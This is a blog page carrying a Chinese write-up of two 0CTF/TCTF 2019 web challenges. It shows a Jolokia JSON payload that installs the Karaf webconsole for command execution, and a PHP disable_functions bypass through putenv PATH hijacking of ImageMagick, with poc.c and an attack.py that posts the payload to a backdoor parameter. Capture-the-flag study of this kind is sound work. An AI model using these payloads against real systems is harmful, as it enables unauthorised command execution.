<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang>
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="ctf,web,">










<meta name="description" content="Ghost Pepper题目链接：http://111.186.63.207:31337 一开始进去除了得到karaf:karaf，于是使用其登录进去，发现是404，于是我就开始怀疑是不是自己的账号密码不对了Orz…经过大佬提点，Ghost Pepper=鬼椒=Jolokia。">
<meta name="keywords" content="ctf,web">
<meta property="og:type" content="article">
<meta property="og:title" content="0CTF&#x2F;TCTF 2019 Quals Web">
<meta property="og:url" content="http://yoursite.com/2019/03/27/0CTF-TCTF-2019-Quals-Web/index.html">
<meta property="og:site_name" content="Glarcy">
<meta property="og:description" content="Ghost Pepper题目链接：http://111.186.63.207:31337 一开始进去除了得到karaf:karaf，于是使用其登录进去，发现是404，于是我就开始怀疑是不是自己的账号密码不对了Orz…经过大佬提点，Ghost Pepper=鬼椒=Jolokia。">
<meta property="og:locale" content="default">
<meta property="og:image" content="http://yoursite.com/img/tctf/web/1.jpg">
<meta property="og:image" content="http://yoursite.com/img/tctf/web/2.jpg">
<meta property="og:image" content="http://yoursite.com/img/tctf/web/3.jpg">
<meta property="og:image" content="http://yoursite.com/img/tctf/web/4.jpg">
<meta property="og:image" content="http://yoursite.com/img/tctf/web/5.jpg">
<meta property="og:image" content="http://yoursite.com/img/tctf/web/6.jpg">
<meta property="og:image" content="http://yoursite.com/img/tctf/web/7.png">
<meta property="og:updated_time" content="2022-04-10T09:51:36.580Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="0CTF&#x2F;TCTF 2019 Quals Web">
<meta name="twitter:description" content="Ghost Pepper题目链接：http://111.186.63.207:31337 一开始进去除了得到karaf:karaf，于是使用其登录进去，发现是404，于是我就开始怀疑是不是自己的账号密码不对了Orz…经过大佬提点，Ghost Pepper=鬼椒=Jolokia。">
<meta name="twitter:image" content="http://yoursite.com/img/tctf/web/1.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2019/03/27/0CTF-TCTF-2019-Quals-Web/">





  <title>0CTF/TCTF 2019 Quals Web | Glarcy</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="default">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Glarcy</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-首页">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-关于">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-标签">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-分类">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-归档">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/03/27/0CTF-TCTF-2019-Quals-Web/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Glarcy">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Glarcy">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">0CTF/TCTF 2019 Quals Web</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2019-03-27T12:20:33+08:00">
                2019-03-27
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="Ghost-Pepper"><a href="#Ghost-Pepper" class="headerlink" title="Ghost Pepper"></a>Ghost Pepper</h2><p>题目链接：<a href="http://111.186.63.207:31337" target="_blank" rel="noopener">http://111.186.63.207:31337</a></p>
<p>一开始进去除了得到karaf:karaf，于是使用其登录进去，发现是404，于是我就开始怀疑是不是自己的账号密码不对了Orz…经过大佬提点，Ghost Pepper=鬼椒=Jolokia。</p>
<a id="more"></a>

<h3 id="信息搜集"><a href="#信息搜集" class="headerlink" title="信息搜集"></a>信息搜集</h3><p>Jolokia 是一个通过 HTTP 的 JMX 连接器，提供了类 RESTful 的操作方式，可以通过 POST JSON 的方式访问和修改 JMX 属性、执行 JMX 操作、搜索 MBean、列出 MBean 的 Meta-data 等。具体参考：</p>
<p><a href="https://www.anquanke.com/post/id/103016" target="_blank" rel="noopener">https://www.anquanke.com/post/id/103016</a></p>
<p><a href="https://www.anquanke.com/post/id/173262" target="_blank" rel="noopener">https://www.anquanke.com/post/id/173262</a></p>
<p>查看官方文档，发现一个叫<a href="https://karaf.apache.org/manual/latest/webconsole" target="_blank" rel="noopener">webconsole</a>的东西，它提供了很多种功能，安装之后可以通过system/console进入终端控制台，尝试访问system/console，返回404，说明webconsole还没有安装</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Installation</span><br><span class="line">To enable the Apache Karaf WebConsole, you just have to install the webconsole feature:</span><br><span class="line"></span><br><span class="line">karaf@root()&gt; feature:install webconsole</span><br><span class="line">The webconsole feature automatically installs the http feature (see the [WebContainer section|webcontainer] for details).</span><br></pre></td></tr></table></figure>

<p>这里提供了一种webconsole的安装方法，通过karaf的feature安装</p>
<p>在官方文档中</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">The MBeans object names have the same format:</span><br><span class="line">org.apache.karaf:type=[feature],name=[instance]</span><br><span class="line"></span><br><span class="line">对于feature</span><br><span class="line">org.apache.karaf:type=feature,name=*: management of the Apache Karaf features.</span><br></pre></td></tr></table></figure>

<p>访问jolokia/list 得到可以访问的MBean，从MBean中查看feature提供的可使用的operation，这里着重关注karaf下的feature下的installFeature，利用installFeature即可安装</p>
<p><img src="../../../../img/tctf/web/1.jpg" alt></p>
<h3 id="攻击"><a href="#攻击" class="headerlink" title="攻击"></a>攻击</h3><h4 id="第一种方法"><a href="#第一种方法" class="headerlink" title="第一种方法"></a>第一种方法</h4><p>来自郁离歌大佬，通过安装webconsole进入控制台cat flag</p>
<p><a href="http://yulige.top/?p=673" target="_blank" rel="noopener">http://yulige.top/?p=673</a></p>
<p>构造一个json数据</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&#123;</span><br><span class="line">  &quot;type&quot;:&quot;EXEC&quot;,</span><br><span class="line">  &quot;mbean&quot;:&quot;org.apache.karaf:name=root,type=feature&quot;,</span><br><span class="line">  &quot;operation&quot;: &quot;installFeature(java.lang.String)&quot;,</span><br><span class="line">  &quot;arguments&quot;: [&quot;webconsole&quot;]</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>将其post到/jolokia，就可以看到返回200，说明执行成功</p>
<p><img src="../../../../img/tctf/web/2.jpg" alt></p>
<p><img src="../../../../img/tctf/web/3.jpg" alt></p>
<p>这时访问/system/console就可以看到webconsole的界面而不是404了</p>
<p><img src="../../../../img/tctf/web/4.jpg" alt></p>
<p>点击Main下的Gogo进入终端，即可执行命令get flag</p>
<p><img src="../../../../img/tctf/web/5.jpg" alt></p>
<h4 id="第二种方法"><a href="#第二种方法" class="headerlink" title="第二种方法"></a>第二种方法</h4><p>来自twings师傅，通过远程安装bundle反弹shell</p>
<p><a href="https://aluvion.github.io/2019/03/26/0CTF-TCTF-Web%E9%A2%98%E8%A7%A3/#more" target="_blank" rel="noopener">https://aluvion.github.io/2019/03/26/0CTF-TCTF-Web%E9%A2%98%E8%A7%A3/#more</a></p>
<h2 id="Wallbreaker-Easy"><a href="#Wallbreaker-Easy" class="headerlink" title="Wallbreaker Easy"></a>Wallbreaker Easy</h2><p>题目链接：<a href="http://111.186.63.208:31340/" target="_blank" rel="noopener">http://111.186.63.208:31340/</a></p>
<h3 id="信息搜集-1"><a href="#信息搜集-1" class="headerlink" title="信息搜集"></a>信息搜集</h3><p>进去看到Imagick并且有一个backdoor，查看phpinfo，可以看到disable_functions：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,system,exec,shell_exec,popen,proc_open,passthru,symlink,link,syslog,imap_open,ld,mail</span><br></pre></td></tr></table></figure>

<p>并且对open_basedir做了限制，但是<code>putenv</code>未被禁用</p>
<p>考察点：<a href="https://www.freebuf.com/articles/web/192052.html" target="_blank" rel="noopener">https://www.freebuf.com/articles/web/192052.html</a></p>
<p>在文章中有四种绕过disable_functions 的手法，其中一种就是利用环境变量 LD_PRELOAD 劫持系统函数，让外部程序加载恶意 *.so，达到执行系统命令的效果。</p>
<p>原理是利用漏洞控制 web 启动新进程 a，a 内部调用系统函数 b()，b() 位于系统共享对象 c.so 中，所以系统为该进程加载 c.so，那如果我们编写一个恶意的c_evil.so，在 c.so 前优先加载 c_evil.so，c_evil.so 内含与 b() 同名的恶意函数，由于 c_evil.so 优先级较高，所以，a 调用的是 c_evil.so 内 b() 而非系统的 c.so 内 b()，同时，c_evil.so 可控，达到执行恶意代码的目的。</p>
<h3 id="本地测试"><a href="#本地测试" class="headerlink" title="本地测试"></a>本地测试</h3><h4 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h4><p>docker+ubuntu18.04环境，注意：由于要使用strace跟踪系统调用，这里需要加上–security-opt seccomp=unconfined，不然没有输出</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">docker run -id --name php --security-opt seccomp=unconfined -p 32770:80 ubuntu</span><br><span class="line"></span><br><span class="line">apt-get install php php-fpm php-imagick nginx strace vim</span><br></pre></td></tr></table></figure>

<p>然后修改/etc/nginx/sites-enabled/default开启php-fpm支持，直接将下方的注释修改一下就好，注意fastcgi_pass unix中的参数值它默认是php7.0-fpm.sock（对于我来说，如果没有这个问题请忽略），需要自行修改为php7.2-fpm.sock，不然访问不了php文件，会出现502</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">location ~ \.php$ &#123;</span><br><span class="line">        #       include snippets/fastcgi-php.conf;</span><br><span class="line">        #</span><br><span class="line">        #       # With php-fpm (or other unix sockets):</span><br><span class="line">                fastcgi_pass unix:/var/run/php/php7.2-fpm.sock;</span><br><span class="line">        #       # With php-cgi (or other tcp sockets):</span><br><span class="line">        #       fastcgi_pass 127.0.0.1:9000;</span><br><span class="line">        &#125;</span><br></pre></td></tr></table></figure>

<p>然后修改/etc/php/7.2/fpm/php.ini，把disable_functions和open_basedir加上去：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">open_basedir = /var/www/html:/tmp/40f955f039eabe222958ff57ac1bfdbb</span><br><span class="line">disable_functions = pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,system,exec,shell_exec,popen,proc_open,passthru,symlink,link,syslog,imap_open,ld,mail</span><br></pre></td></tr></table></figure>

<p>最后在tmp下面新建自己的沙盒，然后启动nginx和php-fpm即可：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">service nginx start</span><br><span class="line">service php7.2-fpm start</span><br></pre></td></tr></table></figure>

<h4 id="测试"><a href="#测试" class="headerlink" title="测试"></a>测试</h4><p>写个a.php</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">	$image = new Imagick(&apos;Sun.bpg&apos;);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>跟踪系统调用</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">strace -f php a.php 2&gt;&amp;1 | grep bpgdec</span><br></pre></td></tr></table></figure>

<p>可以看到输出</p>
<p><img src="../../../../img/tctf/web/6.jpg" alt></p>
<p>因此我们可以伪造一个这样的函数，通过覆盖PATH环境变量的方式，来让ImageMagick执行我们的恶意二进制文件</p>
<p>安装gcc</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">apt-get install make gcc</span><br></pre></td></tr></table></figure>

<p>poc.c</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/types.h&gt;</span></span></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">void</span>)</span></span>&#123;</span><br><span class="line">        system(<span class="string">"/bin/ls -al / &gt; /tmp/pwn"</span>);</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>gcc编译为bpgdec</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gcc poc.c -o bpgdec</span><br></pre></td></tr></table></figure>

<p>b.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    putenv(<span class="string">"PATH=/tmp"</span>);</span><br><span class="line">    $image = <span class="keyword">new</span> Imagick(<span class="string">'Sun.bpg'</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>运行b.php，查看tmp目录下的结果，发现执行成功</p>
<p><img src="../../../../img/tctf/web/7.png" alt></p>
<h3 id="攻击-1"><a href="#攻击-1" class="headerlink" title="攻击"></a>攻击</h3><p>脚本如下：</p>
<p>attack.py</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding:utf8 -*-</span></span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">url = <span class="string">"http://111.186.63.208:31340/"</span></span><br><span class="line">evil = open(<span class="string">"bpgenc"</span>, <span class="string">"rb"</span>).read()</span><br><span class="line">evil = base64.b64encode(evil)</span><br><span class="line">php = <span class="string">"putenv('PATH=/tmp/e10adc3949ba59abbe56e057f20f883e');"</span> \</span><br><span class="line">      <span class="string">"file_put_contents('/tmp/e10adc3949ba59abbe56e057f20f883e/bpgenc', base64_decode('"</span> + evil + <span class="string">"'));"</span> \</span><br><span class="line">      <span class="string">"chmod('/tmp/e10adc3949ba59abbe56e057f20f883e/bpgenc', 0777);"</span> \</span><br><span class="line">      <span class="string">"$image = new Imagick('Sun.bpg');"</span> \</span><br><span class="line">      <span class="string">"echo file_get_contents('/tmp/e10adc3949ba59abbe56e057f20f883e/pwn');"</span></span><br><span class="line">data = &#123;</span><br><span class="line">    <span class="string">"backdoor"</span>: php</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">print</span> requests.post(url, data=data).content</span><br></pre></td></tr></table></figure>

<p>poc.c</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/types.h&gt;</span></span></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">void</span>)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    system(<span class="string">"/readflag &gt; /tmp/e10adc3949ba59abbe56e057f20f883e/pwn"</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>


      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/ctf/" rel="tag"># ctf</a>
          
            <a href="/tags/web/" rel="tag"># web</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/03/19/Wordpress-5-0-RCE-CVE-2019-6977/" rel="next" title="Wordpress 5.0 RCE (CVE-2019-6977)">
                <i class="fa fa-chevron-left"></i> Wordpress 5.0 RCE (CVE-2019-6977)
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/03/30/0CTF-TCTF-2019-Quals-Crypto/" rel="prev" title="0CTF/TCTF 2019 Quals Crypto">
                0CTF/TCTF 2019 Quals Crypto <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/avatar.jpg" alt="Glarcy">
            
              <p class="site-author-name" itemprop="name">Glarcy</p>
              <p class="site-description motion-element" itemprop="description">web小菜鸡</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives">
              
                  <span class="site-state-item-count">42</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">5</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://aluvion.github.io/" title="Twings" target="_blank">Twings</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://xi4or0uji.github.io/" title="Xi4or0uji" target="_blank">Xi4or0uji</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://23r3f.github.io/" title="23R3F" target="_blank">23R3F</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://zszcr.github.io/" title="zs0zrc" target="_blank">zs0zrc</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#Ghost-Pepper"><span class="nav-number">1.</span> <span class="nav-text">Ghost Pepper</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#信息搜集"><span class="nav-number">1.1.</span> <span class="nav-text">信息搜集</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#攻击"><span class="nav-number">1.2.</span> <span class="nav-text">攻击</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#第一种方法"><span class="nav-number">1.2.1.</span> <span class="nav-text">第一种方法</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#第二种方法"><span class="nav-number">1.2.2.</span> <span class="nav-text">第二种方法</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Wallbreaker-Easy"><span class="nav-number">2.</span> <span class="nav-text">Wallbreaker Easy</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#信息搜集-1"><span class="nav-number">2.1.</span> <span class="nav-text">信息搜集</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#本地测试"><span class="nav-number">2.2.</span> <span class="nav-text">本地测试</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#环境搭建"><span class="nav-number">2.2.1.</span> <span class="nav-text">环境搭建</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#测试"><span class="nav-number">2.2.2.</span> <span class="nav-text">测试</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#攻击-1"><span class="nav-number">2.3.</span> <span class="nav-text">攻击</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Glarcy</span>

  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
